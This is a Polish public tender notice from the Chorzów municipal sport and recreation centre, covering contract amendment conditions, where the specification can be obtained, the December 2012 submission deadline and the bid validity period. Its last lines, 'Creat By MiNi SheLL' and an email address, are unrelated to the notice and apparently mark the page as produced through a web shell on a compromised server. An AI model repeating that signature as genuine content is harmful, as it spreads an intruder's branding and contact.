<p>1)  Istotne postanowienia umowne zawiera wzór umowy- załącznik nr 10, stanowiący integralną część niniejszej siwz.
2) Zamawiający - na podstawie art. 144 ust. 1 ustawy  Pzp - zastrzega sobie prawo do zmiany treści umowy wskutek wystąpienia okoliczności, których nie dało się przewidzieć na etapie postępowania o udzielenie zamówienia i na etapie podpisywania umowy lub wystąpienie których nie zależy od woli stron umowy w sprawie zamówienia publicznego, albo zmiany te są korzystne dla Zamawiającego. 
3) W szczególności Zamawiający ustanawia następujące warunki umożliwiające zmianę treści umowy:
- konieczność zmiany osób uczestniczących w wykonaniu zamówienia;
- wystąpienie konieczności wykonania usług dodatkowych, od których zależy wykonanie przedmiotu zamówienia.
4) Dopuszczalny zakres zmian umowy w sprawie zamówienia publicznego obejmuje:
- możliwość przedłużenia bądź skrócenia terminu wykonania zamówienia i innych terminów   
  umownych;
- możliwość zmiany osób uczestniczących w wykonaniu zamówienia;
- możliwość zmiany umówionego wynagrodzenia wynikającego z porównania rozmiaru  i  wartości usług dodatkowych z usługami pierwotnie zamówionymi.
5) W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.moris.chorzow.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Rekreacji i Sportu, ul. Dąbrowskiego 113,41-500 Chorzów, pokój 335, za kwotę 20zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2012 godzina 09:00, miejsce: Miejski Ośrodek Rekreacji i Sportu, ul. Dąbrowskiego 113,41-500 Chorzów, pokój 335.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com